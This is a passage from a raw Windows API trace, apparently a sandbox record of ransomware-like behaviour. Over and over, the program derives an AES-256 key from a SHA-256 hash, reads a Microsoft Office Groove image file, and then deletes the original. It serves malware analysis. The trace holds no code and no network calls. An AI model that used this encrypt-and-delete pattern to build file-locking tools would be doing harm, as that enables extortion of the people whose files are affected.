hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.322] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc1b [0163.323] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.336] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0163.336] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.336] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.337] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\QuestionIcon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\questionicon.jpg")) returned 1 [0163.339] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.339] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.339] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.339] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.339] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x838 [0163.339] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.353] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.353] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.354] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.355] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\QuestionIconMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\questioniconmask.bmp")) returned 1 [0163.357] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.357] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.357] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.357] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.357] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x64fa [0163.357] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.374] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0163.375] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.375] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.376] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Shared16x16Images.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\shared16x16images.jpg")) returned 1 [0163.377] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.378] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.378] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.378] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.378] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf38 [0163.378] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.380] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.380] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.380] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.381] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Shared16x16ImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\shared16x16imagesmask.bmp")) returned 1 [0163.382] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.382] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.382] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.382] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.382] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1963 [0163.382] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.385] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0163.385] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.385] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.386] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Shared24x24Images.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\shared24x24images.jpg")) returned 1 [0163.387] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.388] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.388] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.388] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.388] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1638 [0163.388] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.390] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.390] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.391] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.392] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Shared24x24ImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\shared24x24imagesmask.bmp")) returned 1 [0163.393] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.393] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.393] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.393] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.393] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2d38 [0163.393] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.409] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0163.409] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.409] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.410] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\SketchIconImages.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\sketchiconimages.bmp")) returned 1 [0163.424] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.425] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.425] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.425] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.425] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd97 [0163.425] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.442] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.442] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.443] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.444] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\spacebackupicons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\spacebackupicons.jpg")) returned 1 [0163.445] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.446] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.446] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.446] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.446] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5a4 [0163.446] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.462] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0163.462] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.462] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.464] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\spacebackupiconsmask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\spacebackupiconsmask.bmp")) returned 1 [0163.465] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.466] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.466] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.466] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.466] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x838 [0163.466] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.491] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.491] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.492] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.493] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\StopIconMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\stopiconmask.bmp")) returned 1 [0163.494] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.494] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.494] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.494] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.494] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf38 [0163.495] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.496] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0163.496] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.496] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.498] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\TaskbarIconImages256Colors.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\taskbariconimages256colors.bmp")) returned 1 [0163.499] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.499] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.499] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.499] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.499] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x540 [0163.499] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.512] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.512] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.512] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.514] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\TaskbarIconImagesMask256Colors.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\taskbariconimagesmask256colors.bmp")) returned 1 [0163.515] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.516] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.516] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.516] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.516] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2605 [0163.516] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.539] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0163.539] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.539] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.540] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\TipsImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\tipsimage.jpg")) returned 1 [0163.542] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.542] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.542] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.542] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.542] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x838 [0163.542] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.552] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.552] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.552] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.553] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\TipsImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\tipsimagemask.bmp")) returned 1 [0163.554] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.555] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.555] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.555] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.555] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x450 [0163.555] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.585] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0163.585] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.585] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.587] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\VeriSignLogo.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\verisignlogo.jpg")) returned 1 [0163.588] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.588] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.588] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.588] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.588] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5431 [0163.588] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.592] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.592] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.592] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.593] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WebToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\webtooliconimages.jpg")) returned 1 [0163.594] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.595] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.595] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.595] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.595] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1538 [0163.595] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.614] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0163.614] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.614] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.615] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WebToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\webtooliconimagesmask.bmp")) returned 1 [0163.616] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.617] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.617] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.617] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.617] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1995 [0163.617] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.635] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.635] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.635] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.636] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WebToolImages16x16.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\webtoolimages16x16.jpg")) returned 1 [0163.638] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.638] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.638] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.638] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.638] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x838 [0163.638] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, 